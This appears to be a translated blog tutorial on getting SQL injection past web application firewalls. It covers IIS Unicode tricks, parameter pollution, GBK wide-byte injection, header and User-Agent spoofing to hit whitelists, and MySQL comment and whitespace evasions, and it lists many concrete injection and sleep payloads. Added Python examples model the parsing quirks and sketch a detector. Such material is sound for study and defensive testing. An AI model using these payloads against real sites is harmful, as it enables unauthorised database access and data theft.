One article to understand SQL injection bypass

Table of contents

1. Identify WAF type
  1. Nmap
  2. wafw00f
  3. Observing the block page
2. Observe server characteristics
  1. ASP+IIS
    (1) % feature
    (2) %u feature
  2. ASP+IIS and ASPX+IIS
    (1) IIS parses Unicode
  3. Apache malformed-request bypass
    (1) GET replacement
3. Application layer features
  1. Case bypass
  2. Keyword substitution
  3. Double encoding
  4. Change request method
  5. HPP parameter pollution
    (1) Parameter confusion
    (2) Parameter splicing
    (3) Comma filtered
    (4) Invalid parameters
    (5) Overflow form
  6. Wide byte bypass
    (1) GBK encoding conversion
4. WAF layer features
  1. Logic problems
    (1) CDN-only protection
    (2) Data confusion
    (3) Misconfiguration
    (4) %00 truncation
  2. Performance issues
    (1) Data volume
    (2) Processing capacity
  3. Whitelists
    (1) IP whitelist
    (2) Static resources
    (3) URL whitelist
    (4) Crawler whitelist
5. MySQL database features
  1. MySQL
    (1) Commonly used
    (2) Replacement methods for injection statements
    (3) Functions


1. Identify WAF type


1. Nmap:

Usage: nmap -p 80 --script http-waf-fingerprint URL
Demo:  nmap -p 80 --script http-waf-detect.nse www.baidu.com


2. wafw00f:

Usage: wafw00f URL; the tool ships with Kali.


3. Observing the block page

The WAF type can usually be told from the interception (block) page, although some cannot be identified this way.


2. Observe server characteristics


1. ASP+IIS

If the site's backend language is ASP and the IIS middleware is used, the following WAF bypass postures may exist.

(1) % feature:

Insert a % into the command so that the WAF layer cannot parse the complete command and lets it through, while the database level may still recognise and parse the complete command, thereby bypassing the WAF.


Example: s%elect is split by a %, so the WAF layer may recognise it as s%elect, while the database level may recognise and parse it as select, thereby bypassing the WAF.


(2) %u feature:

This is for bypassing a WAF with Unicode encoding. When IIS parses %u Unicode encoding it replaces it with a multibyte encoding, but several different Unicode encodings are replaced by the same multibyte value, and the WAF layer may recognise only one of them, so switching to another Unicode encoding may get past the WAF's protection.


Example: the Unicode encoding of the e in select is %u0065, but %u00f0 and %u0045 are also transformed into e, and the WAF may recognise only %u0065, so changing it to %u00f0 can bypass the WAF while IIS still parses it as e. It can be understood as

select = s%u0045lect = s%u0065lect = s%u00f0lect

The following is a common Unicode encoding replacement table.

Common test cases for the three keywords union, select, from:
u --> %u0055 --> %u0075
n --> %u004e --> %u006e
i --> %u0049 --> %u0069
o --> %u004f --> %u006f --> %u00ba
s --> %u0053 --> %u0073
l --> %u004c --> %u006c
e --> %u0045 --> %u0065 --> %u00f0
c --> %u0043 --> %u0063
t --> %u0054 --> %u0074 --> %u00de --> %u00fe
f --> %u0046 --> %u0066
r --> %u0052 --> %u0072
m --> %u004d --> %u006d


2. ASP+IIS and ASPX+IIS

(1) IIS parses Unicode

For example, Unicode-encoding the select command gives s%u006c%u0065ct. On receiving it, IIS resolves the Unicode encoding and finally recognises it as select, but the WAF layer may not recognise the Unicode encoding.

3. Apache malformed-request bypass

(1) GET replacement

In a packet initiated as a GET request, the GET method can be replaced by any string (generally POST) without affecting Apache's receipt of the parameter id=2; in other words, replace the GET in the request packet with anything.

3. Application layer features

1. Case bypass

Not much to say about this: change the case of the characters in the command; sometimes this bypasses the WAF.

Example: change select to SeleCt (most WAFs protect against this, but you can still try your luck).

2. Keyword substitution

Keyword substitution is often used in ordinary penetration testing, mainly by finding synonymous functions and substitutes. When certain keywords are blocked by the protection, you can try to replace them.

Some commonly used keyword substitutions:

(1) and --> && --> or --> xor --> || (URL encoding is required when using these; xor is true only when one side is true and the other false, and false in all other cases)
(2) ascii() --> hex() --> bin() --> ord()
(3) sleep() --> benchmark()
(4) substr() --> mid() --> substring()
(5) user() --> @@user
(6) version() --> @@version
(7) # --> -- + --> ;%00
(8) = --> in --> regexp --> like --> <>

3. Double encoding

Double-encode the command; Unicode, base64 and hex can all be tried, and it may get past the WAF's recognition.

4. Change request method

(1) Change a packet submitted with GET to POST by modifying the sent packet.
(2) For a POST request, the POST body can be converted into multipart/form-data format (Burp can do this).

5. HPP parameter pollution

(1) Parameter confusion

Add extra parameters and move the injection location to confuse the identification mechanism when injecting. Assuming a site has an injection point at www.xxxx/?id=1, the details are as follows (this operation behaves differently in different environments).

Operation:

【1】 Add more confusing parameters

For example: ?id=1&id=2&id=3

【2】 In the ASP + IIS environment:

The real id recognised by the system equals 1+2+3, that is, the values of the three ids are concatenated as the received id value. So we can split the attack command across them to bypass the WAF.

For example: ?id=1 union&ID=select 1,2&Id=from admin; the real id value is then

1 union select 1 from admin

【3】 In the PHP + Apache environment:

Here the real id recognised by the system is id=3: only the value of the last id is recognised, regardless of the earlier ones.
 

(2) Parameter splicing

Split the parameter across the three transport channels GET + POST + Cookie.

(3) Comma filtered

?id=1 select 1,2,3,4 from admin can be modified into the following form, which needs no commas

?id=1 union select 1&id=2&id=3&id=4 from admin
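As an added example (not code from the original post), the following Python models how the two back ends above resolve the duplicate id parameters from (1) and (3), and shows why a filter has to inspect the value as the application will join it rather than each value on its own. It assumes ASP on IIS joins duplicates with a comma and matches names case-insensitively, and that PHP on Apache keeps only the last value; the query strings are the article's own cases and the detection pattern is a constructed sample.

```python
"""Model how back ends resolve duplicate query parameters (HPP).

Added example, not code from the original post. Assumptions: ASP on IIS
concatenates duplicate names with a comma and matches names
case-insensitively; PHP on Apache keeps only the last occurrence.
The detection pattern is a constructed sample.
"""
import re
from typing import Optional
from urllib.parse import parse_qsl

# A pattern a simple filter might apply to each parameter value on its own.
SELECT_FROM = re.compile(r"\bselect\b.*\bfrom\b", re.IGNORECASE | re.DOTALL)


def pairs(query: str) -> list[tuple[str, str]]:
    """Ordered (name, value) pairs, duplicates kept, leading '?' ignored."""
    return parse_qsl(query.lstrip("?"), keep_blank_values=True)


def effective_value(query: str, name: str, backend: str) -> Optional[str]:
    """The value the application code actually receives for `name`."""
    if backend == "asp_iis":
        vals = [v for k, v in pairs(query) if k.lower() == name.lower()]
        return ",".join(vals) if vals else None
    if backend == "php_apache":
        vals = [v for k, v in pairs(query) if k == name]
        return vals[-1] if vals else None
    raise ValueError(f"unknown backend {backend!r}")


def duplicate_names(query: str) -> set[str]:
    """Case-folded names that occur more than once: a cheap HPP indicator."""
    counts: dict[str, int] = {}
    for k, _ in pairs(query):
        counts[k.lower()] = counts.get(k.lower(), 0) + 1
    return {k for k, n in counts.items() if n > 1}


def per_value_hit(query: str) -> bool:
    """Naive check: does any single value match the pattern by itself?"""
    return any(SELECT_FROM.search(v) for _, v in pairs(query))


def joined_hit(query: str, name: str, backend: str) -> bool:
    """Same pattern, applied to the value as the given back end would join it."""
    value = effective_value(query, name, backend)
    return bool(value and SELECT_FROM.search(value))


if __name__ == "__main__":
    q = "?id=1 union&ID=select 1,2&Id=from admin"  # the article's split case
    print(effective_value(q, "id", "asp_iis"))     # 1 union,select 1,2,from admin
    print(effective_value(q, "id", "php_apache"))  # 1 union (only the exact name 'id')
    print(per_value_hit(q), joined_hit(q, "id", "asp_iis"))  # False True
```

The same idea applies to the comma-free form: the joined ASP view of ?id=1 union select 1&id=2&id=3&id=4 from admin is the full statement with commas restored.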
   
   
    
    

(4) Invalid parameters


For example: ?a=/*&sql=xxx&b=*/ (parameterless form)

(a and b are invalid parameters, but their values together form a comment (/**/). Making the WAF believe the payload is executed inside a comment means it is not intercepted, yet the parameter between a and b is still injected.)

(5) Overflow form

The overflow form is a particularly common injection method. It relies on overflowing the WAF's buffer: a large amount of dirty data lets our attack command slip past the WAF's interception.

Example: ?id=1/*&id=*//*&id=*//*......&id=*//*&id=*/ union select null,system_user,null from INFORMATION_SCHEMA.schemata

6. Wide byte bypass

(1) GBK encoding conversion

Wide byte injection is a MySQL feature. When MySQL uses GBK encoding, it treats two bytes as one Chinese character (the leading byte's ASCII code must be greater than 128 to fall into the Chinese character range).

The cause of wide byte injection is that part of the protection mechanism uses the addslashes function, which adds a "\" before the illegal characters we input; that "\" then forms a GBK character together with the first byte of our malicious code when parsed, so our injection fails.

Example: injection point: www.xxxx.com?id=1

If you add a single quote as in a normal penetration test, a '\' is generated in front of the single quote, giving "\'", and the single quote forms a GBK code with it.

Now we can add %81 in front of the ', which produces the following

www.xxxx.com?id=1%81\'

Now %81 combines with the generated \ into one GBK code, %81%5C, which GBK recognises as the character for "multiply", so the single quote is unaffected and the injection proceeds normally.

Online GBK code lookup table: GBK code range, GBK code table (qqxiuzi.cn)
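To make the byte-level mechanism above concrete, here is an added Python model (not code from the original post): a PHP-style addslashes, a simplified MySQL-like string lexer in which a GBK lead byte (0x81-0xFE) followed by a valid trail byte (0x40-0x7E or 0x80-0xFE) is one character and a backslash skips exactly one byte, and a charset-aware escaper written here that neutralises a lone lead byte so it cannot pair with the added backslash. The attacker input is constructed from the article's id=1%81' case; the lexer is a model of the behaviour described, not MySQL's code, and parameterised queries remain the real fix.

```python
"""Why addslashes() fails under a GBK connection: a byte-level model.

Added example, not code from the original post. The lexer below is a
simplified model: GBK lead byte 0x81-0xFE plus trail byte 0x40-0x7E or
0x80-0xFE is one character, and a backslash skips exactly one byte.
The sample input is constructed from the article's id=1%81' case.
"""


def addslashes(raw: bytes) -> bytes:
    """PHP addslashes(): a backslash before ' " \\ and NUL, byte by byte."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out += b"\\"
        out.append(b)
    return bytes(out)


def is_gbk_lead(b: int) -> bool:
    return 0x81 <= b <= 0xFE


def is_gbk_trail(b: int) -> bool:
    return 0x40 <= b <= 0x7E or 0x80 <= b <= 0xFE


def literal_closes_early(body: bytes, gbk: bool) -> bool:
    """Lex `'` + body + `'` the way a MySQL-like parser would.

    Returns True if an unescaped closing quote is found inside `body`,
    i.e. the attacker-controlled bytes broke out of the string context.
    """
    i = 0
    while i < len(body):
        b = body[i]
        if gbk and is_gbk_lead(b) and i + 1 < len(body) and is_gbk_trail(body[i + 1]):
            i += 2          # one multibyte character; a 0x5C trail byte is NOT an escape
            continue
        if b == 0x5C:       # backslash: the next byte is taken literally
            i += 2
            continue
        if b == 0x27:       # unescaped single quote: the literal ends here
            return True
        i += 1
    return False


def escape_gbk_aware(raw: bytes) -> bytes:
    """Charset-aware escaping: a lead byte without a valid trail byte is itself escaped."""
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if is_gbk_lead(b):
            if i + 1 < len(raw) and is_gbk_trail(raw[i + 1]):
                out += raw[i:i + 2]        # a complete GBK character passes through
                i += 2
                continue
            out += b"\\" + bytes([b])      # lone lead byte: escape it so it cannot eat our backslash
            i += 1
            continue
        if b in b"'\"\\\x00":
            out += b"\\"
        out.append(b)
        i += 1
    return bytes(out)


if __name__ == "__main__":
    attacker = b"1\x81'"                     # id=1%81'  (constructed from the article)
    naive = addslashes(attacker)             # bytes 31 81 5C 27
    print(literal_closes_early(naive, gbk=False))   # False: single-byte charset, quote escaped
    print(literal_closes_early(naive, gbk=True))    # True: 81 5C is one GBK char, quote is live
    print(literal_closes_early(escape_gbk_aware(attacker), gbk=True))  # False
```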

4. WAF layer features

1. Logic problems

(1) CDN-only protection

Some sites only have CDN protection, so we can bypass it by finding the real IP.

(2) Data confusion

GET and POST are submitted at the same time; the WAF may enter the POST logic and ignore the harmful GET parameters.

(3) Misconfiguration

An HTTPS site may also have the HTTP service open, and only HTTPS may be protected. Replacing https with http in the URL is enough to bypass it.

(4) %00 truncation

Some WAFs cannot recognise the data after %00, so you can use id=1%00 and place the injection statement after it.

2. Performance issues

(1) Data volume

Pad the request with dirty data until it reaches a certain size, with the injection statement placed at the end: for instance pass in many other parameters first and the real parameter last.

(2) Processing capacity

Send the same request many times; some low-performance WAFs can be bypassed this way (send it directly from Burp).

Note: use both of these with caution; they may affect the normal operation of some small websites.

3. Whitelists

(1) IP whitelist

Some WAFs set up a whitelist to make access and management easier for administrators and other staff. If you have obtained the administrator's IP, you can bypass the WAF by modifying the following headers in the request packet (add them if they are absent):

X-Forwarded-For
X-Remote-IP
X-Originating-IP
X-Remote-Addr
X-Real-IP

(2) Static resources

Common static files (.js .jpg .swf .css, etc.): some administrators whitelist these suffixes for convenience of loading resources, and the WAF does not intercept them once recognised. Appending a whitelisted static suffix to the requested path can bypass the WAF.

For example: http://10.9.9.201/sql.php/1.js?id=1

(3) URL whitelist

The principle is the same. Some administrators want to reduce the cost of protection, so some unimportant paths are not protected by the CDN; whether a path is important is decided by a whitelist, and any path on the whitelist is released directly.


Steps: add another parameter whose value is one of these paths; this may also bypass.

(4) Crawler whitelist

This is easy to understand. To gain more weight in search engines such as Baidu and Google, many websites whitelist the UA headers of those search engines' crawlers. We then only need to replace our UA header with the search engine's UA to bypass the WAF.

Disguise the User-Agent as a crawler. Below are some common search engine crawler UA headers.

The following three correspond to Google, Baidu and Yahoo:
UserAgent: "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
UserAgent: "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
UserAgent: "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

5. MySQL database features

1. MySQL:

(1) Commonly used:

Inline comment: /*!12345union*/select
MySQL black magic: select{x user}from{x mysql.user};
Newline bypass: %23%0a, %2d%2d%0a

(2) Replacement methods for injection statements

[1] Common replacements for spaces
/**/
/*!12345union*/
/*anything*/

[2] Whitespace characters

Can be added at any position.
%09,%0a,%0b,%0c,%0d,%20,%a0 can be used as replacements.

Generally %a0 and %0a are used together, that is, %a0%0a.


[3] Replace numbers in the injection statement with floating-point form
[4] Replace the space with 1E0
[5] Replace the space with \N
[6] Wrap the function with spaces or quotation marks
[7] Replace spaces with special symbols

Sometimes spaces are also an important basis for the WAF's judgement, so we can replace spaces with other characters.

Some common replacements:

%21 ! exclamation mark
%2b + plus sign
%2d - minus sign
%40 @ at sign
%7e ~ tilde

(3) Functions

[1] Common string extraction functions

Mid(version(),1,1)
Substr(version(),1,1)
Substring(version(),1,1)
Lpad(version(),1,1)
Rpad(version(),1,1)
Left(version(),1)
reverse(right(reverse(version()),1))

[2] Common string concatenation functions

concat(version(),'|',user());
concat_ws('|',1,2,3)

[3] When special characters are filtered
[1] the comma in limit: limit 1 offset 0
[2] the comma in string extraction: mid(version() from 1 for 1)
[3] the comma in union: union select * from (select 1)a join (select 2)b join (select 3)c
[4] comparison symbols: use greatest instead when they are filtered; greatest returns the maximum of the three parameters

[4] Constructing some functions

【1】 sleep:

id=1 xor sleep%23%0a(5)

id=1 xor sleep%2d%2d%0a(5)

id=1 xor sleep([%20]5)

【2】 select:

select{x[fillable characters]1}
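The evasions collected in this section (and the case, double-encoding and %u tricks earlier) all share one weakness: they fall apart once the value is canonicalised before matching. The following Python is an added example, not code from the original post or from any WAF product: it percent-decodes repeatedly, decodes %uXXXX to its code point only (the IIS best-fit folding described earlier is not modelled), keeps the body of /*!...*/ inline comments, blanks ordinary comments and the #/-- comments that end in %0a, collapses the listed whitespace bytes, and lower-cases, then applies three constructed sample signatures.

```python
"""Canonicalise a parameter value before matching, the way a WAF must.

Added example, not code from the original post or any WAF product.
%uXXXX is decoded to its code point only; IIS best-fit folding is not
modelled. The three signatures are constructed samples.
"""
import re
from urllib.parse import unquote_to_bytes

# Whitespace bytes the article lists as interchangeable separators.
WHITESPACE = "[\t\n\x0b\x0c\r \xa0]+"


def percent_decode(data: bytes, rounds: int = 3) -> bytes:
    """Decode %XX repeatedly: %2553 -> %53 -> S (the article's double encoding)."""
    for _ in range(rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data


def normalize(raw: str) -> str:
    """Return the canonical, lower-cased form of one parameter value."""
    # '+' is a space in form encoding, so "-- +" is a proper "-- " comment.
    data = percent_decode(raw.replace("+", " ").encode("latin-1", "replace"))
    text = data.decode("latin-1")            # byte-preserving: %a0 stays \xa0
    # %uXXXX -> code point, so s%u0065lect -> select
    text = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
    # /*!12345union*/ executes its body on MySQL, so keep the body; /*...*/ is blank.
    text = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", text, flags=re.S)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    # '#' and '-- ' comments run to the newline: sleep%23%0a(5) is sleep(5).
    text = re.sub(r"(#|--(?=\s))[^\n]*(\n|$)", " ", text)
    # Every listed whitespace byte collapses to one space; NUL (%00) is kept.
    text = re.sub(WHITESPACE, " ", text)
    return text.strip().lower()


SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.S),
    "select_from": re.compile(r"\bselect\b.*\bfrom\b", re.S),
    "sleep_call": re.compile(r"\bsleep\s*\("),
}


def detect(raw: str) -> list[str]:
    """Names of the signatures that fire on the canonical form of `raw`."""
    canon = normalize(raw)
    return [name for name, pat in SIGNATURES.items() if pat.search(canon)]


if __name__ == "__main__":
    for sample in ("/*!12345union*/select 1,2 from admin",
                   "1%a0%0aUnIoN%09%2553elect",
                   "1 xor sleep%23%0a(5)",
                   "id=1 xor sleep%2d%2d%0a(5)"):
        print(repr(sample), "->", repr(normalize(sample)), detect(sample))
```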

This article is suitable for beginners in SQL injection during penetration testing, or for those with little knowledge of SQL injection. This is only a part. The most important point is that although there are many bypass postures here, the various magic bypass methods derived from nesting these postures at multiple layers are often what work best in actual combat.


Origin blog.csdn.net/weixin_46622976/article/details/131679533